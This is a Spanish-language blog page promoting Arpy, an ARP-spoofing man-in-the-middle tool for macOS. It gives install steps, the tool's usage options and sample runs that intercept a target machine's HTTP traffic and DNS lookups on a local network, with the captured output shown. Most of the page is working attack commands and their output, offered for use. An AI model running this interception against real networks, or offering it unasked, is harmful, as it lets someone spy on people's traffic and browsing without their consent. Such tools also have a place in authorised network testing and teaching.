Arpy - Herramienta Mac OSX ARP Spoof (MiTM)

Arpy es una herramienta MiTM de suplantación de ARP fácil de usar para Mac.

Proporciona 3 funciones específicas:

  • Paquetes de olfateo
  • Dominios visitados
  • Dominios visitados con Gource

  • Python 2.7
  • Gource
  • Scapy
  • libdnet

    Instalación:

    • Gource:
    brew install gource

    • Scapy:
    pip install scapy

    • libdnet:
    $ git clone https://github.com/dugsong/libdnet.git
    $ cd libdnet
    $ ./configure && make && make install
    cd python
    python setup.py install
    

    Uso:

    ivanvza:~/ > sudo arpy
         _____
        |  _  |___ ___ _ _
        |     |  _| . | | |
        |__|__|_| |  _|_  |
        MiTM Tool |_| |___|
        v3.15 -@viljoenivan
    
    Usage: arpy -t <Target IP> -g <Gateway IP> -i <Interface>
    
    ARP MiTM Tool
    
    Options:
      -h, --help            show this help message and exit
      -t TARGET, --target=TARGET
                            The Target IP
      -g GATEWAY, --gateway=GATEWAY
                            The Gateway
      -i INTERFACE, --interface=INTERFACE
                            Interface to use
      --tcp                 Filters out only tcp traffic
      --udp                 Filters out only udp traffic
      -d D_PORT, --destination_port=D_PORT
                            Filter for a destination port
      -s S_PORT, --source_port=S_PORT
                            Filter for a source port
      --sniff               Sniff all passing data
      --sniff-dns           Sniff only searched domains
      --sniff-dns-gource    Output target's DNS searches in gource format
      -v                    Verbose scapy packet print
    

    Huele el paquete:

    Este es el rastreador de paquetes, le permite ver el tráfico de su objetivo.

    ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff
         _____
        |  _  |___ ___ _ _
        |     |  _| . | | |
        |__|__|_| |  _|_  |
        MiTM Tool |_| |___|
        v3.15 -@viljoenivan
    
    
      [Info] Starting Sniffer...
    
    [Info] Enabling IP Forwarding...
    [Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3))
    
    [Info] Found the following (IP layer): 192.168.1.3 -> 46.101.34.90
    GET / HTTP/1.1
    User-Agent: curl/7.37.1
    Host: ivanvza.ninja
    Accept: */*
    
    
    
    [Info] Found the following (IP layer): 46.101.34.90 -> 192.168.1.3
    HTTP/1.1 200 OK
    Vary: Accept-Encoding
    Content-Type: text/html
    Accept-Ranges: bytes
    ETag: "2719538271"
    Last-Modified: Thu, 30 Apr 2015 08:25:15 GMT
    Content-Length: 3213
    Date: Fri, 29 May 2015 20:15:06 GMT
    Server: Microsoft IIS
    
    <html>
         <title>><></title>
        <body>
            <pre style="line-height: 1.25; white-space: pre;">
                      SORRY            /
                                      /
                  This page does     /
               ]   not exist yet.    [    ,'|
               ]                     [   /  |
               ]___               ___[ ,'   |
               ]  ]             /[  [ |:   |
               ]  ]            / [  [ |:   |
               ]  ]  ]         [  [  [ |:   |
               ]  ]  ]__     __[  [  [ |:   |
               ]  ]  ] ] _ /[ [  [  [ |:   |
               ]  ]  ] ] (#) [ [  [  [ :===='
               ]  ]  ]_].nHn.[_[  [  [
               ]  ]  ]  HHHHH. [  [  [
               ]  ] /   `HH("N   [  [
               ]__]/     HHH  "  [__[
               ]         NNN         [
               ]         N/"         [
               ]         N H         [
              /          N            
             /           q,            
            /                           
            </pre>
            <h3 id="list"><h3>
        </body>
    <script>
    
    // NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23
    var RTCPeerConnection = /*window.RTCPeerConnection ||

    Sniff de DNS:

    Esta función le permite ver los nombres de dominio que su objetivo está solicitando actualmente.

    ivanvza:~/ > sudo arpy -t 192.168.1.4 -g 192.168.1.1 -i en0 --sniff-dns
         _____
        |  _  |___ ___ _ _
        |     |  _| . | | |
        |__|__|_| |  _|_  |
        MiTM Tool |_| |___|
             - @viljoenivan
    
    
      [Info] Starting DNS Sniffer...
    
    [Info] Enabling IP Forwarding...
    [Info] Done...
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: www.youtube.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s2.googleusercontent.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: google.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s.ytimg.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: fonts.gstatic.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: yt3.ggpht.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: i.ytimg.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing.google.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.
    Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.

    Sniff de DNS con Gource:

    Esta función es más o menos la misma que la anterior, sin embargo, proporciona la funcionalidad de pasar por Gource para obtener una transmisión en vivo de lo que está viendo su objetivo.

    ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff-dns-gource
    [INFO] For a live gource feed run this command in parallel with this one:
    
    tail -f /tmp/36847parsed_nmap | tee /dev/stderr | gource -log-format custom -a 1 --file-idle-time 0 -
    
    [Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3) and dst port 53)
    

    Contenido relacionado

    Deja una respuesta

    Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

    Subir